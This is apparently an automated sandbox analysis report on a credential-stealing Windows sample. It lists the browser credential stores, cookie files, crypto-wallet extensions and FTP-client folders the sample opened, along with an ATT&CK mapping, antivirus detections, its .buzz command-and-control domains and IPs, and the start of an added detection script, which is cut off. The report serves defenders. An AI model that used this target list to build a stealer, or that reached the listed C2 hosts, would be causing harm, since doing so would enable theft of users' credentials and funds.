                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\zi042476Iv.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\FACWLRWHGG
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\FACWLRWHGG
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\FENIVHOIKN
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\HTAGVDFUIE
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\HTAGVDFUIE
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\NHPKIZUUSG
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\NHPKIZUUSG
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\UMMBDNEQBN
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\YPSIACHYXW
                Source: C:\Users\user\Desktop\zi042476Iv.exe | Directory queried: C:\Users\user\Documents\YPSIACHYXW
                Source: Yara match | File source: 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: zi042476Iv.exe PID: 6492, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: Process Memory Space: zi042476Iv.exe PID: 6492, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 44 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 851 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 44 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 41 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing
                LSA Secrets223
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Antivirus detections for the submitted file

Source | Detection | Scanner | Label
zi042476Iv.exe | 53% | Virustotal |
zi042476Iv.exe | 58% | ReversingLabs | Win32.Infostealer.Tinba
zi042476Iv.exe | 100% | Avira | TR/Crypt.TPM.Gen
zi042476Iv.exe | 100% | Joe Sandbox ML |

No Antivirus matches
Antivirus detections for URLs

Source | Detection | Scanner | Label
https://mindhandru.buzz/1 | 100% | Avira URL Cloud | malware
https://mindhandru.buzz/lf | 100% | Avira URL Cloud | malware
https://mindhandru.buzz/apip | 100% | Avira URL Cloud | malware
https://mindhandru.buzz/apizZ | 100% | Avira URL Cloud | malware
https://mindhandru.buzz/O | 100% | Avira URL Cloud | malware
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208. | 0% | Avira URL Cloud | safe
https://mindhandru.buzz/K | 100% | Avira URL Cloud | malware
https://mindhandru.buzz/apix | 100% | Avira URL Cloud | malware
Contacted domains with a resolved IP

Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
mindhandru.buzz | 172.67.165.185 | true | false | | high

Contacted domains and URLs without a resolved IP

Name | Malicious | Antivirus Detection | Reputation
scentniej.buzz | false | | high
rebuildeso.buzz | false | | high
appliacnesot.buzz | false | | high
screwamusresz.buzz | false | | high
cashfuzysao.buzz | false | | high
inherineau.buzz | false | | high
prisonyfork.buzz | false | | high
hummskitnj.buzz | false | | high
mindhandru.buzz | false | | high
https://mindhandru.buzz/api | false | | high

Note that the Malicious column above is the sandbox's automatic classification of the domain, not a verdict on the sample's traffic: the same report marks the second Cloudflare address of mindhandru.buzz (104.21.11.101, see the IP table below and the related-sample list) as malicious, and Avira URL Cloud flags several mindhandru.buzz paths as malware. Only mindhandru.buzz resolved during the run; the other eight .buzz names were queried without a resolution, which is consistent with LummaC cycling through a list of fallback C2 domains, so all nine should be treated as indicators.
URLs found in process memory

Each entry gives the URL, the memory dumps it was found in (Source), the Malicious flag, and the antivirus detection and reputation reported.

https://duckduckgo.com/chrome_newtab
  Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

http://crl.microP
  Source: zi042476Iv.exe, 00000000.00000003.1381810990.000000000133D000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1617123572.000000000134A000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550699749.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551564568.00000000012FB000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://duckduckgo.com/ac/?q=
  Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://www.google.com/images/branding/product/ico/googleg_lodp.ico
  Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://mindhandru.buzz/1
  Source: zi042476Iv.exe, 00000000.00000002.1619925358.0000000001354000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: malware; Reputation: unknown

https://mindhandru.buzz/
  Source: zi042476Iv.exe, 00000000.00000002.1619925358.000000000136F000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
  Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

http://crl.rootca1.amazontrust.com/rootca1.crl0
  Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://mindhandru.buzz/apip
  Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: malware; Reputation: unknown

https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
  Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

http://ocsp.rootca1.amazontrust.com0:
  Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://mindhandru.buzz/lf
  Source: zi042476Iv.exe, 00000000.00000003.1550520984.0000000005CC4000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550598616.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: malware; Reputation: unknown

https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
  Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://www.ecosia.org/newtab/
  Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://mindhandru.buzz/apizZ
  Source: zi042476Iv.exe, 00000000.00000003.1617123572.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619925358.000000000136F000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: malware; Reputation: unknown

https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
  Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://mindhandru.buzz/apix
  Source: zi042476Iv.exe, 00000000.00000003.1550469871.000000000136F000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: malware; Reputation: unknown

https://mindhandru.buzz/d
  Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550469871.000000000136F000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1555179762.000000000136F000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
  Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: safe; Reputation: unknown

https://ac.ecosia.org/autocomplete?q=
  Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
  Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

http://x1.c.lencr.org/0
  Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

http://x1.i.lencr.org/0
  Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
  Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

http://crt.rootca1.amazontrust.com/rootca1.cer0?
  Source: zi042476Iv.exe, 00000000.00000003.1502269209.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
  Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
  Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
  Source: zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://mindhandru.buzz/K
  Source: zi042476Iv.exe, 00000000.00000003.1381810990.00000000012E3000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: malware; Reputation: unknown

https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
  Source: zi042476Iv.exe, 00000000.00000003.1526850805.0000000005CCA000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://mindhandru.buzz/O
  Source: zi042476Iv.exe, 00000000.00000003.1527140960.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526983311.0000000005CC7000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1526775202.0000000005CC5000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Antivirus Detection: Avira URL Cloud: malware; Reputation: unknown

https://support.mozilla.org/products/firefoxgro.all
  Source: zi042476Iv.exe, 00000000.00000003.1503355540.0000000006091000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high

https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
  Source: zi042476Iv.exe, 00000000.00000003.1382704975.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382768716.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1382854119.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp
  Malicious: false; Reputation: high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.165.185 | mindhandru.buzz | United States | 13335 | CLOUDFLARENETUS | false
104.21.11.101 | unknown | United States | 13335 | CLOUDFLARENETUS | true
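The domain, IP and URL tables above are the part of this report a defender will actually reuse. The following is an added example, not part of the Joe Sandbox report, that turns those indicators into a detection: it matches DNS queries and proxy requests against the nine .buzz domains, the two Cloudflare IPs and the https://mindhandru.buzz/api endpoint listed above, and additionally flags a host that queries several of the listed domains within a short window, the failover behaviour visible in this run where eight names were tried without a resolution. The log line format, the host names, the 60-second window and the threshold of three domains are assumptions made for the example; the sample log lines are constructed, not taken from the report.

```python
"""Match the C2 indicators from the report against DNS and proxy log lines.

Added example; not part of the Joe Sandbox report. The log format, host names,
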